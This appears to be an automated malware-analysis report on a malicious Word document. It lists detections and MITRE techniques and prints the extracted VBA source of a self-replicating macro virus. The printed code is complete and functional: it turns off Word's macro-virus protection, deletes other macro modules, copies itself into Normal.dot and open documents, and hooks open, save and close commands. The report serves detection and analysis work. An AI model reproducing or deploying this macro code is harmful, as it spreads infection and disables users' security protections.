MALICIOUS
Risk Score: 188
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The document contains VBA macro code (flagged by the 'OLE_VBA_MACROS' and 'OLE_LEGACY_WORDBASIC_MACRO_VIRUS' heuristics), including an 'AutoOpen' macro that runs automatically when the document is opened, which suggests malicious intent. The macro appears to clean or modify the Normal template, potentially to establish persistence or evade detection, as suggested by the 'Linis_Cls' and 'Linis_Bbq' modules. The document body itself is a lure for a paid seminar, a common pretext in phishing and financial scams.
Heuristics (5)
- ClamAV: Doc.Trojan.Opey-18 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Opey-18
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Application.OrganizerCopy Source:=NormalTemplate.FullName, _`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6188 bytes |

SHA-256 of macros.bas: 94c21f6a8046e48274f222a2b7d1ec4d70eac4c7bec4be6e594946e639730f77
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Linis_Cls"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_Creatable = True
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Linis_Cls: class wrapper around Word's macro virus protection switch
' and the "save changes to Normal template" prompt
Property Let clsProctection(pValue As Boolean)
    Options.VirusProtection = pValue
End Property
Property Let clsSaveNormal(pValue As Boolean)
    Options.SaveNormalPrompt = pValue
End Property

Attribute VB_Name = "Linis_Bbq"
' ------------------------------------------------------------------------------------
' USER: Linis-BBQ-2000
' AUTHOR: FRANCIS LIM
' DATE CREATED: Oct 20, 2000
' ------------------------------------------------------------------------------------
' Hawaan: deletes every other module from Normal.dot and from each open document,
' then copies Linis_Cls and the Linis_Bbq module into any document (and into
' Normal.dot) that does not yet carry them. This is the self-replication routine.
Private Sub Hawaan()
    On Error Resume Next
    Dim DocuName$, OpenDocImmunized As Boolean
    Dim I%, J%, NmImmunized$
    NmImmunized = "0"
    For I = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
        DocuName = NormalTemplate.VBProject.VBComponents(I).Name
        If DocuName = GetSource() Then NmImmunized = "1"
        If (DocuName <> GetSource()) And _
           (DocuName <> "Linis_Cls") And _
           (DocuName <> "ThisDocument") Then
            Application.OrganizerDelete _
                Source:=NormalTemplate.FullName _
                , Name:=DocuName _
                , Object:=wdOrganizerObjectProjectItems
        End If
    Next I
    For Each opendoc In Documents
        OpenDocImmunized = False
        With opendoc
            For J = opendoc.VBProject.VBComponents.Count To 1 Step -1
                DocuName = opendoc.VBProject.VBComponents(J).Name
                If DocuName = GetSource() Then OpenDocImmunized = True
                If (DocuName <> GetSource()) And _
                   (DocuName <> "Linis_Cls") And _
                   (DocuName <> "ThisDocument") And _
                   (DocuName <> "Reference to Normal") Then
                    Application.OrganizerDelete Source:=opendoc.FullName _
                        , Name:=DocuName _
                        , Object:=wdOrganizerObjectProjectItems
                End If
            Next J
            If Not OpenDocImmunized Then
                Application.OrganizerCopy Source:=NormalTemplate.FullName, _
                    Destination:=opendoc.FullName, _
                    Name:="Linis_Cls", _
                    Object:=wdOrganizerObjectProjectItems
                opendoc.SaveAs FileName:=opendoc.FullName
                Application.OrganizerCopy Source:=NormalTemplate.FullName, _
                    Destination:=opendoc.FullName, _
                    Name:=GetSource(), _
                    Object:=wdOrganizerObjectProjectItems
                opendoc.SaveAs FileName:=opendoc.FullName
            End If
        End With
    Next opendoc
    ' Normal.dot not yet infected: export both modules via a temp file and import them
    If NmImmunized = "0" Then
        ActiveDocument.VBProject.VBComponents.Item(GetSource).Export Application.Path & "\102002HS.TMP"
        NormalTemplate.VBProject.VBComponents.Import Application.Path & "\102002HS.TMP"
        ActiveDocument.VBProject.VBComponents.Item("Linis_Cls").Export Application.Path & "\102002HS.TMP"
        NormalTemplate.VBProject.VBComponents.Import Application.Path & "\102002HS.TMP"
        Kill Application.Path & "\102002HS.TMP"
    End If
End Sub

' Protectahan: turns off Word's macro virus protection and the save-Normal prompt,
' stamps user/document metadata, resets the Tools menu and the Visual Basic toolbar,
' and removes the Alt+F8 / Alt+F11 key bindings in the Normal template.
Sub Protectahan()
    Dim clsOption As Linis_Cls
    On Error Resume Next
    Set clsOption = New Linis_Cls
    Application.DisplayAlerts = wdAlertsAll
    WordBasic.DisableAutoMacros -1
    With Application
        .UserName = "FRANCIS LIM"
        .UserAddress = "Linis-BBQHS-2000"
        .UserInitials = "BBQ-KY"
    End With
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "FRANCIS LIM"
        .Keywords = "Linis-BBQHS-2000"
        .Execute
    End With
    With Options
        .ConfirmConversions = True
    End With
    clsOption.clsProctection = False
    clsOption.clsSaveNormal = False
    With ActiveDocument
        .ReadOnlyRecommended = False
    End With
    With CommandBars("Visual Basic")
        .Enabled = True
        .Protection = msoBarTypeMenuBar
        .Protection = msoBarMenuBar
    End With
    With CommandBars("Tools")
        .Reset
        .Controls("Macro").Reset
        .Controls("Customize...").Reset
    End With
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Clear
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Clear
    CustomizationContext = NormalTemplate
    Set clsOption = Nothing
End Sub

' The File* subs below override Word's built-in menu commands so that the
' infection routine runs on every save, close, exit, new, open and save-as.
Sub FileSave()
    On Error Resume Next
    Call Protectahan
    Call Hawaan
    ActiveDocument.Save
End Sub
Sub FileClose()
    On Error Resume Next
    Call Protectahan
    Call Hawaan
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
End Sub
Sub FileExit()
    On Error Resume Next
    Call Protectahan
    Call Hawaan
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub
Sub FileNew()
    On Error Resume Next
    Call Protectahan
    Call Hawaan
    Dialogs(wdDialogFileNew).Show
    Call Hawaan
End Sub
Sub AutoOpen()
    On Error Resume Next
    Call Protectahan
    Call Hawaan
End Sub
Sub AutoExec()
    On Error Resume Next
    Call Protectahan
    Call Hawaan
End Sub
Sub FileSaveAs()
    On Error Resume Next
    Call Protectahan
    Call Hawaan
    Dialogs(wdDialogFileSaveAs).Show
    Call Hawaan
End Sub
Sub FileOpen()
    On Error Resume Next
    Call Protectahan
    Call Hawaan
    Dialogs(wdDialogFileOpen).Show
    Call Hawaan
End Sub

' GetSource: assembles the module name "Linis_Bbq" from character codes
' so the string does not appear literally in the source.
Function GetSource() As String
    On Error Resume Next
    GetSource = Chr(76) & Chr(105) & Chr(110) & Chr(105) & Chr(115) & Chr(95) & Chr(66) & Chr(98) & Chr(113)
End Function
```